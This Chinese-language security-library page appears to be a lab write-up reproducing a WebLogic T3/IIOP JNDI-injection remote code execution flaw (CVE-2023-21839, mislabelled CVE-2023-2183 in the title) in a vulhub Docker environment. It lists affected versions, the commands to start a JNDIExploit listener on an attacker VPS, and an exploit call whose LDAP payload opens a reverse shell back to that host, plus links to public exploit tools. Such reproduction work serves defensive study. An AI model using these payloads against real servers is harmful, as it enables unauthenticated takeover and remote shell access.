Weblogic远程代码执行CVE-2023-2183-漏洞文库小世界-安全文库-NGC660 安全实验室

Weblogic远程代码执行CVE-2023-2183

简介

WebLogic存在远程代码执行漏洞,该漏洞允许未经身份验证的远程,通过T3/IIOP协议网络访问并破坏WebLogic服务器,成功利用此漏洞可导致Oracle WebLogic服务器被接管。
通过rmi/ldap远程协议进行远程命令执行。从而拿shell

影响版本

Oracle WebLogic Server 12.2.1.3.0
Oracle WebLogic Server 12.2.1.4.0
Oracle WebLogic Server 14.1.1.0.0

环境搭建

直接用vulhub上的环境复现,比较方便

wget https://github.com/vulhub/vulhub/archive/master.zip -O vulhub-master.zip
unzip vulhub-master.zip
cd vulhub-master

m_401f0bfa0e300316df0e7847df5e6350_r
启动docker后进入weblogic文件夹

cd vulhub-master
cd weblogic
cd CVE-2023-21839/

m_93baacc8bd10a05aace5c01f877ed334_r
虚拟机centos的docker环境不知道为啥无法启动。。。换vps了

docker compose up -d

m_c3fc7d729018fa9c13c86df2e655ab9e_r
m_646ab12e8426cf6858967a6a5670b49c_r

复现过程

将 JNDI Exploit-1.2命令注入工具上传到VPS 攻击机,开启 jndi 监听

java -jar JNDIExploit-1.2-SNAPSHOT.jar -i vps ip

m_c03cff670b447a9644ae072d8ce43f01_r
攻击机执行如下payload:

CVE-2023-21839 -ip xx.xx.xx.xx -port 7001 -ldap ldap://xx.xx.xx.xx:1389/Basic/ReverseShell/xx.xx.xx.xx/6789

NC监听,成功接收请求
m_20f81ad23b085eeb4b5bb44dc903b399_r

相关工具

JNDI Exploit-1.2命令注入工具

https://github.com/Jeromeyoung/JNDIExploit-1

一款用于 JNDI注入 利用的工具,大量参考/引用了 Rogue JNDI 项目的代码,支持直接植入内存shell,并集成了常见的bypass 高版本JDK的方式,适用于与自动化工具配合使用。

Weblogic CVE-2023-21839 RCE

https://github.com/4ra1n/CVE-2023-21839

(1)无需任何 Java 依赖,构造协议通过socket直接RCE
(2)已解决 IIOP 的 NAT 网络问题(可测试 Docker 与公网目标)
编译:

cd cmd
go build -o CVE-2023-21839
./CVE-2023-21839 -ip 127.0.0.1 -port 7001 -ldap ldap://127.0.0.1:1389/evil
请登录后发表评论

    请登录后查看回复内容